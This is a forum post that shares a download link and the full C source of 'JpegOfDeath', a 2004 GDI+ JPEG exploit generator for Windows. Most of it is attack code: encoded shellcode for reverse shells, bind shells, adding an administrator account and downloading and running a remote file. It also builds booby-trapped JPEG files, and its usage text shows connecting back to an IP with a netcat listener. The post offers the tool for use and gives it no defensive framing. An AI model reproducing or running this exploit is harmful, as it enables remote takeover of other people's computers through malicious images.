Jump to content
bossjuan

jpegadmin

By bossjuan, in Cosul de gunoi

Recommended Posts

bossjuan Newbie

bossjuan

Posted
Posted

http://rapidshare.de/files/25029686/jpegadmin.rar.html

si exploit-ul

Exploit:

/*

* Exploit Name:

* =============

* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload

* =============

* Tweaked Exploit By M4Z3R For GSO

* All Credits & Greetings Go To:

* ==========

* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack

* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,

* Nick Fitzgerald, Adam Nance (where are you?),

* Santa Barbara, Jenna Jameson, John Kerry, so1o,

* Computer Security Industry, Rom Hackers, My chihuahuas

* (Rocky, Sailor, and Penny)...

* ===========

* Flags Usage:

* -a: Add User X with Pass X to Admin Group;

* IE: Exploit.exe -a pic.jpg

* -d: Download a File From an HTTP Server;

* IE: Exploit.exe -d [url]http://YourWebServer/Patch.exe[/url] pic.jpg

* -r: Send Back a Shell To a Specified IP on a Specific Port;

* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)

* -b: Bind a Shell on The Exploited Machine On a Specific Port;

* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

* Disclaimer:

* ===========

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR

* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES

* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.

* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,

* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT

* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,

* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY

* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT

* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF

* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE

*

*/

  

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <windows.h>

#pragma comment(lib, "ws2_32.lib")



// Exploit Data...



char reverse_shellcode[] =

"xD9xE1xD9x34"

"x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"

"x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"

"x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"

"x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"

"xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"

"x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"

"x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"

"x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"

"xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"

"x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"

"xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"

"xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"

"x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"

"xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"

"xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"

"xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"

"xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"

"xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"

"x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"

"x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"

"x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"

"x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"

"x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";



char bind_shellcode[] =

"xD9xE1xD9x34x24x58x58x58"

"x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"

"xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"

"x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"

"x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"

"x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"

"x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"

"x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"

"xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"

"x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"

"x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"

"x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"

"xA3x6DxC5xC5xFAx90x92x83xCEx1Bx74xF8x82xC4xC1x6D"

"xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"

"x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"

"x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"

"x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"

"xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"

"x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"

"xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"

"xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"

"x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"

"x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"

"x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"

"x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";



char http_shellcode[]=

"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"

"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"

"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"

"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"

"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"

"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"

"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"

"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"

"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"

"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"

"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"

"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"

"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"

"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"

"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"

"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"

"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"

"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"

"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"

"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"

"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"

"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"

"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"

"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"

"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"

"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"

"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"

"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"

"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"

"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"

"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"

"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"

"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"

"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"

"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"

"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"

"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"

"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"

"x27x39x72x6Fx72x17"

"m00!";



char admin_shellcode[] =

"x66x81xecx80x00x89xe6xe8xb7x00x00x00x89x06x89xc3"

"x53x68x7exd8xe2x73xe8xbdx00x00x00x89x46x0cx53x68"

"x8ex4ex0execxe8xafx00x00x00x89x46x08x31xdbx53x68"

"x70x69x33x32x68x6ex65x74x61x54xffxd0x89x46x04x89"

"xc3x53x68x5exdfx7cxcdxe8x8cx00x00x00x89x46x10x53"

"x68xd7x3dx0cxc3xe8x7ex00x00x00x89x46x14x31xc0x31"

"xdbx43x50x68x72x00x73x00x68x74x00x6fx00x68x72x00"

"x61x00x68x73x00x74x00x68x6ex00x69x00x68x6dx00x69"

"x00x68x41x00x64x00x89x66x1cx50x68x58x00x00x00x89"

"xe1x89x4ex18x68x00x00x5cx00x50x53x50x50x53x50x51"

"x51x89xe1x50x54x51x53x50xffx56x10x8bx4ex18x49x49"

"x51x89xe1x6ax01x51x6ax03xffx76x1cx6ax00xffx56x14"

"xffx56x0cx56x6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"

"xadx8bx40x08x5exc2x04x00x53x55x56x57x8bx6cx24x18"

"x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01"

"xebxe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38"

"xe0x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1"

"x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04"

"x8bx01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00";



char header1[] =

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"

"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"

"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"

"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"

"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"

"x2Ex3Ex35x35x35x35x35x3E";



char setNOPs1[] =

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



char setNOPs2[] =

"x3ExE8x00x00x00x00x5Bx8Dx8B"

"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



char header2[] =

"x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"

"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"

"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"

"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"

"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"

"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"

"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"

"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"

"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"

"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"

"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"

"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"

"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"

"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"

"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"

"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"

"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"

"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"

"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"

"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"

"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"

"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"

"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"

"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"

"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"

"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"

"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"

"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"

"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"

"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"

"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"

"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"

"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"

"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"

"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"

"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"

"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"

"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"

"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"

"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"

"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"

"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"

"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"

"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"

"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"

"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"

"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"

"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"

"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"

"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"

"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"

"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"

"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"

"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"

"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"

"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"

"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"

"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"

"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"

"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"

"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"

"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"

"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"

"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"

"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"

"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"

"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"

"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"

"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"

"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"

"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68";



char admin_header0[]=

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64x00x60x00x00"

"xFFxECx00x11x44x75x63x6Bx79x00x01x00x04x00x00x00x0Ax00x00"

"xFFxEEx00x0Ex41x64x6Fx62x65x00x64xC0x00x00x00x01"
;



char admin_header1[]=

"xFFxFEx00x01"
;



char admin_header2[]=

"x00x14x10x10x19x12x19x27x17x17x27x32"
;



char admin_header3[]=

"xEBx0Fx26x32"
;



char admin_header4[]=

"xDCxB1xE7x70"
;



char admin_header5[]=

"x26x2Ex3Ex35x35x35x35x35x3E"

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"
;



char admin_header6[]=

"x00x00x00xFFxDBx00x43x00x08x06x06x07x06x05x08x07x07"

"x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14"

"x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1C"

"x1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3C"

"x2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0D"

"x0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32xFFxC0x00x11x08x00x03x00x03x03x01x22"

"x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01"

"x01x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05"

"x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03x02"

"x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00x04x11x05"

"x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1x08"

"x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17"

"x18x19x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43"

"x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64"

"x65x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85"

"x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4"

"xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3"

"xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1"

"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8"

"xF9xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01"

"x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0A"

"x0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07x05x04"

"x04x00x01x02x77x00x01x02x03x11x04x05x21x31x06x12x41"

"x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09x23"

"x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19"

"x1Ax26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47"

"x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68"

"x69x6Ax73x74x75x76x77x78x79x7Ax82x83x84x85x86x87x88"

"x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7"

"xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6"

"xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5"

"xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00"

"x0Cx03x01x00x02x11x03x11x00x3Fx00xF9xFEx8Ax28xA0x0F"
;



// Code...

char newshellcode[2048];



unsigned char xor_data(unsigned char byte)

{

return(byte ^ 0x92);

}



void print_usage(char *prog_name)

{

printf(" Exploit Usage:n");

printf("t%s -r your_ip | -b [-p port] <jpeg_filename>nn", prog_name);

printf("ttt -a | -d <source_file> <jpeg_filename>nn");

printf(" Parameters:nn");

printf("t-r your_ip or -bt Choose -r for reverse connect attack modenttttand choose -b for a bind attack.

By defaultntttt if you don't specify -r or-b then a bindntttt attack will be generated.nn");

printf("t-a or -dtt The -a flag will create a user X with pass X, ntttt on the admin localgroup. The -d flag,

willntttt execute the source http path of the filentttt given.n");

printf("nt-p (optional)tt This option will allow you to change the port ntttt used for a bind or reverse

connect attack.ntttt If the attack mode is bindthen thentttt victim will open the -p port. If the

attackntttt modeis reverse connect then the port yountttt specify will be the one you wantto listen

ntttt on so the victim can connect to yountttt right away.nn");

printf(" Examples:n");

printf("t%s -r 68.6.47.62 -p 8888 test.jpgn", prog_name);

printf("t%s -b -p 1542 myjpg.jpgn", prog_name);

printf("t%s -a whatever.jpgn", prog_name);

printf("t%s -d [url]http://webserver.com/patch.exe[/url] exploit.jpgnn", prog_name);

printf(" Remember if you use the -r option to have netcat listeningn");

printf(" on the port you are using for the attack so the victim willn");

printf(" be able to connect to you when exploited...nn");

printf(" Example:n");

printf("tnc.exe -l -p 8888");

exit(-1);

}



int main(int argc, char *argv[])

{

FILE *fout;

unsigned int i = 0,j = 0;

int raw_num = 0;

unsigned long port = 1337; // default port for bind and reverse attacks

unsigned long encoded_port = 0;

unsigned long encoded_ip = 0;

unsigned char attack_mode = 2; // bind by default

char *p1 = NULL, *p2 = NULL;

char ip_addr[256];

char str_num[16];

char jpeg_filename[256];

WSADATA wsa;



printf(" +------------------------------------------------+n");

printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |n");

printf(" | Exploit by John Bissell A.K.A. HighT1mes |n");

printf(" | TweaKed By M4Z3R For GSO |n");

printf(" | September, 23, 2004 |n");

printf(" +------------------------------------------------+n");



if (argc < 2)

print_usage(argv[0]);





 // process commandline

for (i = 0; i < (unsigned) argc; i++)

{



 if (argv[i][0] == '-')

 {



 switch (argv[i][1])

  {

  

  // reverse connect

  case 'r':

  strncpy(ip_addr, argv[i+1], 20);

   attack_mode = 1;

  break;

  

  // bind

  case 'b':

   attack_mode = 2;

  break;

  

  // Add.Admin

  case 'a':

   attack_mode = 3;

  break;



  // DL

  case 'd':

   attack_mode = 4;

  break;



  // port

  case 'p':

  port = atoi(argv[i+1]);

  break;

  }

 }

}



strncpy(jpeg_filename, argv[i-1], 255);

fout = fopen(argv[i-1], "wb");

       

if( !fout ) {

printf("Error: JPEG File %s Not Created!n", argv[i-1]);

return(EXIT_FAILURE);

}



  // initialize the socket library



if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {

printf("Error: Winsock didn't initialize!n");

exit(-1);

}



encoded_port = htonl(port);

encoded_port += 2;



if (attack_mode == 1)

{



  // reverse connect attack



 reverse_shellcode[184] = (char) 0x90;

 reverse_shellcode[185] = (char) 0x92;

 reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));

 reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));



 p1 = strchr(ip_addr, '.');

 strncpy(str_num, ip_addr, p1 - ip_addr);

 raw_num = atoi(str_num);

 reverse_shellcode[179] = xor_data((char)raw_num);



 p2 = strchr(p1+1, '.');

 strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);

 raw_num = atoi(str_num);

 reverse_shellcode[180] = xor_data((char)raw_num);



 p1 = strchr(p2+1, '.');

 strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);

 raw_num = atoi(str_num);

 reverse_shellcode[181] = xor_data((char)raw_num);



 p2 = strrchr(ip_addr, '.');

 strncpy(str_num, p2+1, 5);

 raw_num = atoi(str_num);

 reverse_shellcode[182] = xor_data((char)raw_num);

}



if (attack_mode == 2)

{

  // bind attack



 bind_shellcode[204] = (char) 0x90;

 bind_shellcode[205] = (char) 0x92;

 bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));

 bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));

}





if (attack_mode == 4)

{



  // Http DL

     

   strcpy(newshellcode,http_shellcode);

      strcat(newshellcode,argv[2]);

      strcat(newshellcode,"x01");

     

}

  

  // build the exploit jpeg



if ( attack_mode != 3)

{

 j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;

     

 for(i = 0; i < sizeof(header1) - 1; i++)

 fputc(header1[i], fout);



 for(i=0;i<sizeof(setNOPs1)-1;i++)

 fputc(setNOPs1[i], fout);



 for(i=0;i<sizeof(header2)-1;i++)

 fputc(header2[i], fout);



 for( i = j; i < 0x63c; i++)

 fputc(0x90, fout);

 j = i;

}



if (attack_mode == 1)

{

 for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)

 fputc(reverse_shellcode[i], fout);

}



else if (attack_mode == 2)

{

 for(i = 0; i < sizeof(bind_shellcode) - 1; i++)

 fputc(bind_shellcode[i], fout);

}



else if (attack_mode == 4)

{

 for(i = 0; i<sizeof(newshellcode) - 1; i++)

 {fputc(newshellcode[i], fout);}



 for(i = 0; i< sizeof(admin_shellcode) - 1; i++)

 {fputc(admin_shellcode[i], fout);}

}



else if (attack_mode == 3)

{



  for(i = 0; i < sizeof(admin_header0) - 1; i++){fputc(admin_header0[i], fout);}

  

  for(i = 0; i < sizeof(admin_header1) - 1; i++){fputc(admin_header1[i], fout);}



  for(i = 0; i < sizeof(admin_header2) - 1; i++){fputc(admin_header2[i], fout);}

  

  for(i = 0; i < sizeof(admin_header3) - 1; i++){fputc(admin_header3[i], fout);}



  for(i = 0; i < sizeof(admin_header4) - 1; i++){fputc(admin_header4[i], fout);}



  for(i = 0; i < sizeof(admin_header5) - 1; i++){fputc(admin_header5[i], fout);}

  

  for(i = 0; i < sizeof(admin_header6) - 1; i++){fputc(admin_header6[i], fout);}

  

  for (i = 0; i<1601; i++){fputc('x41', fout);}



  for(i = 0; i < sizeof(admin_shellcode) - 1; i++){fputc(admin_shellcode[i], fout);}





}



if (attack_mode != 3 )

{

 for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)

 fputc(0x90, fout);



 for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)

 fputc(setNOPs2[j], fout);

       

}



fprintf(fout, "xFFxD9");





fcloseall();



WSACleanup();



printf(" Exploit JPEG file %s has been generated!n", jpeg_filename);



return(EXIT_SUCCESS);

}  

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...